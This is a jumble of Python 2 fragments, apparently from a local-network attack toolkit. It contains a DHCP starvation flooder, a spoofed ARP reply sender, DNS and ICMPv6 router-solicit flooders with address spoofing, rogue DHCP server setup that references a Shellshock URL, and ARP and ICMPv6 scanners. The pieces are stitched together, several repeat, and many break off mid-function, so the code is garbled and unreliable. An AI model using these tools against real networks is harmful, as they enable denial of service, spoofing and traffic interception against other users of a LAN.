def __init__(self):
from base import Base
from network import Ethernet_raw, IPv6_raw, ICMPv6_raw
self.base = Base()
self.eth = Ethernet_raw()
self.ipv6 = IPv6_raw()
self.icmpv6 = ICMPv6_raw()
self.rawSocket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
self.results = []
self.unique_results = []
self.mac_addresses = []
self.retry_number = 3
self.timeout = 0
self.router_info = {}
# region Create vendor list
self.mac_prefixes_file = utils_path + "mac-prefixes.txt"
self.vendor_list = []
with open(self.mac_prefixes_file, 'r') as mac_prefixes_descriptor:
for string in mac_prefixes_descriptor.readlines():
string_list = string.split(" ", 1)
self.vendor_list.append({
"prefix": string_list[0],
"vendor": string_list[1][:-1]
})
def send_dhcp_discover():
sleep(1)
eth = Ethernet_raw()
dhcp = DHCP_raw()
Base.print_info("Sending discover packets...")
Base.print_info("Delay between DISCOVER packets: ", str(args.delay),
" sec.")
Base.print_info("Start sending packets: ",
str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")))
discover_raw_socket = socket(AF_PACKET, SOCK_RAW)
discover_raw_socket.bind((listen_network_interface, 0))
try:
while True:
client_mac = eth.get_random_mac()
transaction_id = randint(1, 4294967295)
discover_packet = dhcp.make_request_packet(
source_mac=your_mac_address,
client_mac=client_mac,
transaction_id=transaction_id,
dhcp_message_type=1,
host_name=None,
requested_ip=None,
option_value=dhcp_option_value,
option_code=dhcp_option_code,
relay_agent_ip=your_ip_address)
discover_raw_socket.send(discover_packet)
transactions[transaction_id] = client_mac
if int(time() - start_time) > args.timeout:
if ack_received:
Base.print_success(
"IP address pool is exhausted: ",
str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")))
else:
Base.print_error("DHCP Starvation failed timeout!")
sleep(1)
exit(1)
sleep(int(args.delay))
except KeyboardInterrupt:
Base.print_info("Exit")
discover_raw_socket.close()
exit(0)
def __init__(self):
from base import Base
from network import Ethernet_raw, ARP_raw
self.base = Base()
self.eth = Ethernet_raw()
self.arp = ARP_raw()
self.rawSocket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
self.results = []
self.unique_results = []
self.mac_addresses = []
self.mac_prefixes_file = utils_path + "mac-prefixes.txt"
self.vendor_list = []
self.retry_number = 3
self.timeout = 0
def send_dhcp_discover():
sleep(1)
eth = Ethernet_raw()
dhcp = DHCP_raw()
print Base.c_info + "Sending discover packets..."
print Base.c_info + "Delay between DISCOVER packets: " + Base.cINFO + str(
args.delay) + " sec." + Base.cEND
print Base.c_info + "Start sending packets: " + Base.cINFO + str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")) + \
Base.cEND
while True:
client_mac = eth.get_random_mac()
transaction_id = randint(1, 4294967295)
discover_packet = dhcp.make_request_packet(
source_mac=_current_mac_address,
client_mac=client_mac,
transaction_id=transaction_id,
dhcp_message_type=1,
host_name=None,
requested_ip=None,
option_value=_dhcp_option_value,
option_code=_dhcp_option_code,
relay_agent_ip=_current_ip_address)
sendp(discover_packet, iface=_current_network_interface, verbose=False)
_transactions[transaction_id] = client_mac
if int(time() - _start_time) > args.timeout:
if _ack_received:
print Base.c_success + "IP address pool is exhausted: " + Base.cSUCCESS + \
str(datetime.now().strftime("%Y/%m/%d %H:%M:%S")) + Base.cEND
else:
print Base.c_error + "DHCP Starvation failed!"
system('kill -9 ' + str(getpid()))
sleep(int(args.delay))
except:
print "This network interface does not have mac address!"
exit(1)
count = 0
count_max = int(args.packets)
index_percent = 0
count_percent = 0
print "Creating packets..."
if args.notspoofmac:
print " Your MAC address is not spoofed!"
eth = Ethernet_raw()
dhcp = DHCP_raw()
while count < count_max:
if args.notspoofmac:
SRC_MAC = current_mac_address
else:
SRC_MAC = eth.get_mac_for_dhcp_discover()
CLIENT_MAC = eth.get_random_mac()
HOST_NAME = Base.make_random_string(8)
current_packet = dhcp.make_discover_packet(SRC_MAC, CLIENT_MAC,
HOST_NAME)
PACKETS.append(current_packet)
help='Network for IP spoofing (example: "192.168.0.0/24")',
default=None)
parser.add_argument('-P',
'--dstport',
type=int,
help='Set destination port (default: 53)',
default=53)
parser.add_argument('-l',
'--pathtodomainlist',
type=str,
help='Set path to file with domain list',
default=None)
args = parser.parse_args()
eth = Ethernet_raw()
dns = DNS_raw()
if args.pathtodomainlist is not None:
print "Create your DNS name list..."
try:
with open(args.pathtodomainlist, "r") as domain_list:
for domain_name in domain_list:
NAMES.append(domain_name[:-1])
print " List of domains len: " + str(len(NAMES))
print " List of domains created: " + NAMES[0] + " ... " + NAMES[
len(NAMES) - 1]
except:
print "File: " + args.pathtodomainlist + " not found!"
exit(1)
parser.add_argument('-d', '--delay', type=float, help='Set delay between packets (default: 0.5)', default=0.5)
parser.add_argument('-t', '--target_mac', type=str, help='Set target client mac address')
parser.add_argument('-T', '--target_ip', type=str, required=True, help='Set target client ip address (required)')
parser.add_argument('-s', '--sender_mac', type=str, help='Set sender mac address, if not set use random mac')
parser.add_argument('-S', '--sender_ip', type=str, required=True, help='Set sender IP address (required)')
args = parser.parse_args()
# endregion
# region Set global variables
current_network_interface = None
sender_mac_address = None
target_mac_address = None
eth = Ethernet_raw()
arp = ARP_raw()
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for send ARP reply packets ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have MAC address!")
exit(1)
# endregion
# region Set target and sender MAC address
from base import Base
from network import Ethernet_raw, IP_raw, UDP_raw, DHCP_raw
Base.check_platform()
Base.check_user()
Base.netiface_selection()
eth = Ethernet_raw()
ip = IP_raw()
udp = UDP_raw()
dhcp = DHCP_raw()
print eth.get_random_mac()
print ":".join("{:02x}".format(ord(c)) for c in eth.make_header("aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb", 2048))
print ip.get_random_ip()
print ":".join("{:02x}".format(ord(c)) for c in ip.make_header("127.0.0.1", "127.0.0.1", 0, 8, 1))
print ":".join("{:02x}".format(ord(c)) for c in udp.make_header(12345, 53, 0))
print ":".join("{:02x}".format(ord(c)) for c in dhcp.make_discover_packet("aa:aa:aa:aa:aa:aa", "bb:bb:bb:bb:bb:bb",
"10.10.10.10", "test"))
Base.print_banner()
if __name__ == "__main__":
parser = ArgumentParser(description='ICMPv6 router solicit packets sender')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for send TCP packets')
parser.add_argument('-m', '--src_mac', type=str, help='Set src mac address (not required)', default=None)
parser.add_argument('-a', '--src_ipv6', type=str, help='Set src ipv6 address (not required)', default=None)
parser.add_argument('-p', '--number_of_packets', type=int, help='Set number of packets (default=100000)', default=100000)
parser.add_argument('-t', '--number_of_iterations', type=int, help='Set number of iteration (default=100)', default=100)
args = parser.parse_args()
icmpv6 = ICMPv6_raw()
eth = Ethernet_raw()
rs_packets = []
if args.interface is None:
current_network_interface = Base.netiface_selection()
else:
current_network_interface = args.interface
if args.src_mac is None:
src_mac_address = Base.get_netiface_mac_address(current_network_interface)
else:
src_mac_address = args.src_mac
if args.src_ipv6 is None:
src_ipv6_address = Base.get_netiface_ipv6_link_address(current_network_interface)
else:
Base.print_warning("Please set a network interface for sniffing ICMPv6 responses ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have MAC address!")
exit(1)
your_ipv6_link_address = Base.get_netiface_ipv6_link_address(current_network_interface)
if your_ipv6_link_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have link local IPv6 address!")
exit(1)
# endregion
# region Target MAC is set
eth = Ethernet_raw()
target_mac_address = None
if args.target_mac is not None:
if eth.convert_mac(args.target_mac):
target_mac_address = str(args.target_mac).lower()
# endregion
# region General output
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your IPv6 address: ", your_ipv6_link_address)
Base.print_info("Your MAC address: ", your_mac_address)
if target_mac_address is not None:
Base.print_info("Target MAC address: ", target_mac_address)
parser.add_argument('--ip_path', type=str, help='Set path to "ip" command, default = /bin/', default="/bin/")
parser.add_argument('--iface_name', type=str, help='Set iface name, default = eth0', default="eth0")
parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server mac address, if not set use your mac address')
parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your ip address')
parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address')
parser.add_argument('--netmask', type=str, help='Set network mask, if not set use your netmask')
parser.add_argument('--broadcast', type=str, help='Set network broadcast, if not set use your broadcast')
parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address')
parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800)
parser.add_argument('--domain', type=str, help='Set domain name for search, default=test.com', default="test.com")
parser.add_argument('--proxy', type=str, help='Set proxy', default=None)
args = parser.parse_args()
eth = Ethernet_raw()
dhcp = DHCP_raw()
current_network_interface = None
target_mac_address = None
offer_ip_address = None
dhcp_server_mac_address = None
dhcp_server_ip_address = None
router_ip_address = None
network_mask = None
network_broadcast = None
dns_server_ip_address = None
number_of_dhcp_request = 0
shellshock_url = None
proxy = None
domain = None
parser.add_argument('--domain',
type=str,
help='Set domain name for search, default=test.com',
default="test.com")
parser.add_argument('--proxy', type=str, help='Set proxy', default=None)
parser.add_argument('--tftp',
type=str,
help='Set TFTP server IP address',
default=None)
args = parser.parse_args()
if not args.quiet:
Base.print_banner()
eth = Ethernet_raw()
dhcp = DHCP_raw()
current_network_interface = None
target_mac_address = None
target_ip_address = None
offer_ip_address = None
dhcp_server_mac_address = None
dhcp_server_ip_address = None
router_ip_address = None
network_mask = None
network_broadcast = None
dns_server_ip_address = None
tftp_server_ip_address = None
number_of_dhcp_request = 0
shellshock_url = None
parser = ArgumentParser(description='ARP reply sender')
parser.add_argument('-i', '--interface', type=str, help='Set interface name for send reply packets')
parser.add_argument('-c', '--count', type=int, help='Set count of nak requests (default: 3)', default=3)
parser.add_argument('-t', '--target_mac', type=str, required=True, help='Set target client mac address')
parser.add_argument('-o', '--target_ip', type=str, required=True, help='Set target client ip address')
parser.add_argument('-d', '--sender_mac', type=str, help='Set sender mac address, if not set use random mac')
parser.add_argument('-p', '--sender_ip', type=str, required=True, help='Set sender IP address')
args = parser.parse_args()
current_network_interface = None
sender_mac_address = None
sender_ip_address = None
eth = Ethernet_raw()
if args.interface is None:
current_network_interface = Base.netiface_selection()
else:
current_network_interface = args.interface
if args.sender_mac is None:
sender_mac_address = eth.get_random_mac()
else:
sender_mac_address = args.sender_mac
print "\r\nNetwork interface: " + current_network_interface
print "Target mac address: " + args.target_mac
print "Target IP address: " + args.target_ip
print "Sender mac address: " + sender_mac_address
class ArpScan:
# region Set variables
base = None
eth = None
arp = None
rawSocket = None
network_interface = None
your_mac_address = None
your_ip_address = None
target_ip_address = None
results = None
unique_results = None
mac_addresses = None
mac_prefixes_file = None
vendor_list = None
retry_number = 0
timeout = 0
# endregion
# region Init
def __init__(self):
from base import Base
from network import Ethernet_raw, ARP_raw
self.base = Base()
self.eth = Ethernet_raw()
self.arp = ARP_raw()
self.rawSocket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
self.results = []
self.unique_results = []
self.mac_addresses = []
self.mac_prefixes_file = utils_path + "mac-prefixes.txt"
self.vendor_list = []
self.retry_number = 3
self.timeout = 0
# endregion
# region Sniffer
def sniff(self):
while True:
packets = self.rawSocket.recvfrom(2048)
for packet in packets:
# Parse Ethernet header
ethernet_header = packet[0:14]
ethernet_header_dict = self.eth.parse_header(ethernet_header)
# Success parse Ethernet header
if ethernet_header_dict is not None:
# 2054 - Type of ARP packet (0x0806)
if ethernet_header_dict['type'] == 2054:
# Destination MAC address is your MAC address
if ethernet_header_dict[
'destination'] == self.your_mac_address:
# Parse ARP packet
arp_header = packet[14:42]
arp_header_dict = self.arp.parse_packet(arp_header)
# Success parse ARP packet
if arp_header_dict is not None:
# ARP opcode == 2 (2 - ARP reply)
if arp_header_dict['opcode'] == 2:
# ARP target MAC address is your MAC address
if arp_header_dict[
'target-mac'] == self.your_mac_address:
# ARP target IP address is your IP address
if arp_header_dict[
'target-ip'] == self.your_ip_address:
# Parameter Target IP address is None
if self.target_ip_address is None:
self.results.append({
"mac-address":
arp_header_dict[
'sender-mac'],
"ip-address":
arp_header_dict[
'sender-ip']
})
# Parameter Target IP address is Set
else:
if arp_header_dict[
'sender-ip'] == self.target_ip_address:
self.results.append({
"mac-address":
arp_header_dict[
'sender-mac'],
"ip-address":
arp_header_dict[
'sender-ip']
})
# endregion
# region Sender
def send(self):
arp_requests = []
self.your_mac_address = self.base.get_netiface_mac_address(
self.network_interface)
self.your_ip_address = self.base.get_netiface_ip_address(
self.network_interface)
first_ip_address = str(
IPv4Address(
unicode(self.base.get_netiface_first_ip(
self.network_interface))) - 1)
last_ip_address = str(
IPv4Address(
unicode(self.base.get_netiface_last_ip(
self.network_interface))) + 1)
if self.target_ip_address is not None:
if self.base.ip_address_in_range(self.target_ip_address,
first_ip_address,
last_ip_address):
first_ip_address = self.target_ip_address
last_ip_address = self.target_ip_address
else:
self.base.print_error(
"Bad target IP address: ", self.target_ip_address,
"; Target IP address must be in range: ",
first_ip_address + " - " + last_ip_address)
exit(1)
index = 0
while True:
current_ip_address = str(
IPv4Address(unicode(first_ip_address)) + index)
index += 1
if IPv4Address(unicode(current_ip_address)) > IPv4Address(
unicode(last_ip_address)):
break
else:
arp_request = self.arp.make_request(
ethernet_src_mac=self.your_mac_address,
ethernet_dst_mac="ff:ff:ff:ff:ff:ff",
sender_mac=self.your_mac_address,
sender_ip=self.your_ip_address,
target_mac="00:00:00:00:00:00",
target_ip=current_ip_address)
arp_requests.append(arp_request)
send_socket = socket(AF_PACKET, SOCK_RAW)
send_socket.bind((self.network_interface, 0))
for arp_request in arp_requests:
if self.retry_number > 0:
for i in range(self.retry_number):
send_socket.send(arp_request)
else:
send_socket.send(arp_request)
send_socket.close()
# endregion
# region Scanner
def scan(self,
network_interface,
timeout=3,
retry=3,
target_ip_address=None,
check_vendor=True):
# region Set variables
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Create vendor list
if check_vendor:
with open(self.mac_prefixes_file, 'r') as mac_prefixes_descriptor:
for string in mac_prefixes_descriptor.readlines():
string_list = string.split(" ", 1)
self.vendor_list.append({
"prefix": string_list[0],
"vendor": string_list[1][:-1]
})
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Reset results and mac addresses list
self.results = []
self.mac_addresses = []
# endregion
# region Get vendors
for result_index in range(len(self.unique_results)):
# Get current MAC address prefix
current_mac_prefix = self.eth.get_mac_prefix(
self.unique_results[result_index]['mac-address'])
# Search this prefix in vendor list
for vendor_index in range(len(self.vendor_list)):
if current_mac_prefix == self.vendor_list[vendor_index][
'prefix']:
self.unique_results[result_index][
'vendor'] = self.vendor_list[vendor_index]['vendor']
break
# Could not find this prefix in vendor list
if 'vendor' not in self.unique_results[result_index].keys():
self.unique_results[result_index]['vendor'] = "Unknown vendor"
# endregion
# region Return results
return self.unique_results
# endregion
# endregion
# region Get MAC address
def get_mac_address(self,
network_interface,
target_ip_address,
timeout=5,
retry=5):
try:
# region Set variables
self.target_ip_address = target_ip_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return
if 'mac-address' in self.results[0].keys():
return self.results[0]['mac-address']
else:
return "ff:ff:ff:ff:ff:ff"
# endregion
except IndexError:
return "ff:ff:ff:ff:ff:ff"
except KeyboardInterrupt:
self.base.print_info("Exit")
exit(0)
class ICMPv6Scan:
# region Set variables
base = None
eth = None
ipv6 = None
icmpv6 = None
rawSocket = None
network_interface = None
your_mac_address = None
your_ipv6_link_address = None
target_mac_address = None
results = None
unique_results = None
mac_addresses = None
mac_prefixes_file = None
vendor_list = None
retry_number = 0
timeout = 0
icmpv6_identifier = 0
router_info = None
router_search = False
# endregion
# region Init
def __init__(self):
from base import Base
from network import Ethernet_raw, IPv6_raw, ICMPv6_raw
self.base = Base()
self.eth = Ethernet_raw()
self.ipv6 = IPv6_raw()
self.icmpv6 = ICMPv6_raw()
self.rawSocket = socket(AF_PACKET, SOCK_RAW, htons(0x0003))
self.results = []
self.unique_results = []
self.mac_addresses = []
self.retry_number = 3
self.timeout = 0
self.router_info = {}
# region Create vendor list
self.mac_prefixes_file = utils_path + "mac-prefixes.txt"
self.vendor_list = []
with open(self.mac_prefixes_file, 'r') as mac_prefixes_descriptor:
for string in mac_prefixes_descriptor.readlines():
string_list = string.split(" ", 1)
self.vendor_list.append({
"prefix": string_list[0],
"vendor": string_list[1][:-1]
})
# endregion
# endregion
# region Sniffer
def sniff(self):
while True:
packets = self.rawSocket.recvfrom(2048)
for packet in packets:
# Parse Ethernet header
ethernet_header = packet[0:14]
ethernet_header_dict = self.eth.parse_header(ethernet_header)
# Parse Ethernet header
if ethernet_header_dict is None:
break
# Source MAC address is target mac address
if not self.router_search:
if self.target_mac_address != "33:33:00:00:00:01":
if ethernet_header_dict['source'] != self.target_mac_address:
break
# Destination MAC address is your MAC address
if not self.router_search:
if ethernet_header_dict['destination'] != self.your_mac_address:
break
# Check type of ethernet header
if ethernet_header_dict['type'] != self.ipv6.header_type:
break
# Parse IPv6 header
ipv6_header = packet[14:14 + self.ipv6.header_length]
ipv6_header_dict = self.ipv6.parse_header(ipv6_header)
# Check parse IPv6 header
if ipv6_header_dict is None:
break
# Check IPv6 next header type
if ipv6_header_dict['next-header'] != self.icmpv6.packet_type:
break
# Parse ICMPv6 packet
icmpv6_packet = packet[14 + self.ipv6.header_length:]
icmpv6_packet_dict = self.icmpv6.parse_packet(icmpv6_packet)
# Check parse ICMPv6 packet
if icmpv6_packet_dict is None:
break
if self.router_search:
# 134 Type of ICMPv6 Router Advertisement
if icmpv6_packet_dict['type'] != 134:
break
# Save router information
self.router_info['router_mac_address'] = ethernet_header_dict['source']
self.router_info['router_ipv6_address'] = ipv6_header_dict['source-ip']
self.router_info['flags'] = hex(icmpv6_packet_dict['flags'])
self.router_info['router-lifetime'] = int(icmpv6_packet_dict['router-lifetime'])
self.router_info['reachable-time'] = int(icmpv6_packet_dict['reachable-time'])
self.router_info['retrans-timer'] = int(icmpv6_packet_dict['retrans-timer'])
for icmpv6_ra_option in icmpv6_packet_dict['options']:
if icmpv6_ra_option['type'] == 3:
self.router_info['prefix'] = str(icmpv6_ra_option['value']['prefix']) + "/" + \
str(icmpv6_ra_option['value']['prefix-length'])
if icmpv6_ra_option['type'] == 5:
self.router_info['mtu'] = int(icmpv6_ra_option['value'], 16)
if icmpv6_ra_option['type'] == 25:
self.router_info['dns-server'] = str(icmpv6_ra_option['value']['address'])
# Search router MAC address prefix in vendor list
router_mac_prefix = self.eth.get_mac_prefix(self.router_info['router_mac_address'])
for vendor_index in range(len(self.vendor_list)):
if router_mac_prefix == self.vendor_list[vendor_index]['prefix']:
self.router_info['vendor'] = self.vendor_list[vendor_index]['vendor']
# Could not find this prefix in vendor list
if 'vendor' not in self.router_info.keys():
self.router_info['vendor'] = "Unknown vendor"
else:
# 129 Type of ICMPv6 Echo (ping) reply
if icmpv6_packet_dict['type'] != 129:
break
# Check ICMPv6 Echo (ping) reply identifier
if icmpv6_packet_dict['identifier'] == self.icmpv6_identifier:
self.results.append({
"mac-address": ethernet_header_dict['source'],
"ip-address": ipv6_header_dict['source-ip']
})
# endregion
# region Sender
def send(self):
self.your_mac_address = self.base.get_netiface_mac_address(self.network_interface)
self.your_ipv6_link_address = self.base.get_netiface_ipv6_link_address(self.network_interface)
send_socket = socket(AF_PACKET, SOCK_RAW)
send_socket.bind((self.network_interface, 0))
if self.router_search:
request = self.icmpv6.make_router_solicit_packet(ethernet_src_mac=self.your_mac_address,
ipv6_src=self.your_ipv6_link_address)
else:
if self.target_mac_address is None:
self.target_mac_address = "33:33:00:00:00:01"
request = self.icmpv6.make_echo_request_packet(ethernet_src_mac=self.your_mac_address,
ethernet_dst_mac=self.target_mac_address,
ipv6_src=self.your_ipv6_link_address,
ipv6_dst="ff02::1",
id=self.icmpv6_identifier)
for _ in range(self.retry_number):
send_socket.send(request)
sleep(0.1)
send_socket.close()
# endregion
# region Scanner
def scan(self, network_interface, timeout=3, retry=3, target_mac_address=None, check_vendor=True):
# region Set variables
self.target_mac_address = target_mac_address
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
self.icmpv6_identifier = randint(1, 65535)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Unique results
for index in range(len(self.results)):
if self.results[index]['mac-address'] not in self.mac_addresses:
self.unique_results.append(self.results[index])
self.mac_addresses.append(self.results[index]['mac-address'])
# endregion
# region Reset results and mac addresses list
self.results = []
self.mac_addresses = []
# endregion
# region Get vendors
for result_index in range(len(self.unique_results)):
# Get current MAC address prefix
current_mac_prefix = self.eth.get_mac_prefix(self.unique_results[result_index]['mac-address'])
# Search this prefix in vendor list
for vendor_index in range(len(self.vendor_list)):
if current_mac_prefix == self.vendor_list[vendor_index]['prefix']:
self.unique_results[result_index]['vendor'] = self.vendor_list[vendor_index]['vendor']
break
# Could not find this prefix in vendor list
if 'vendor' not in self.unique_results[result_index].keys():
self.unique_results[result_index]['vendor'] = "Unknown vendor"
# endregion
# region Return results
return self.unique_results
# endregion
# endregion
# region Search IPv6 router
def search_router(self, network_interface, timeout=3, retry=3):
# region Set variables
self.router_search = True
self.network_interface = network_interface
self.timeout = int(timeout)
self.retry_number = int(retry)
# endregion
# region Run sniffer
tm = ThreadManager(2)
tm.add_task(self.sniff)
# endregion
# region Run sender
self.send()
# endregion
# region Wait
sleep(self.timeout)
# endregion
# region Return results
return self.router_info
help='Set delay between packets',
default=1)
parser.add_argument('-q',
'--quiet',
action='store_true',
help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
ipv6 = IPv6_raw()
icmpv6 = ICMPv6_raw()
udp = UDP_raw()
dhcpv6 = DHCPv6_raw()
recursive_dns_address = None
target_mac_address = None
target_ipv6_address = None
first_suffix = None
last_suffix = None
clients = {}
# region DHCP NAK
if request['DHCP'][53] == 6:
Base.print_error("NAK from: ", dhcp_server_ip,
" your client ip: ", yiaddr)
# endregion
# endregion
# region Main function
if __name__ == "__main__":
try:
# region MAC change technique
if args.mac_change:
eth = Ethernet_raw()
# region Get old ip and mac addresses
old_mac_address = Base.get_netiface_mac_address(
listen_network_interface)
old_ip_address = Base.get_netiface_ip_address(
listen_network_interface)
# endregion
# region Stop network
Base.print_info("Stop network ...")
system('service network-manager stop')
system('service networking stop 2>/dev/null')
system('service network stop 2>/dev/null')
# endregion
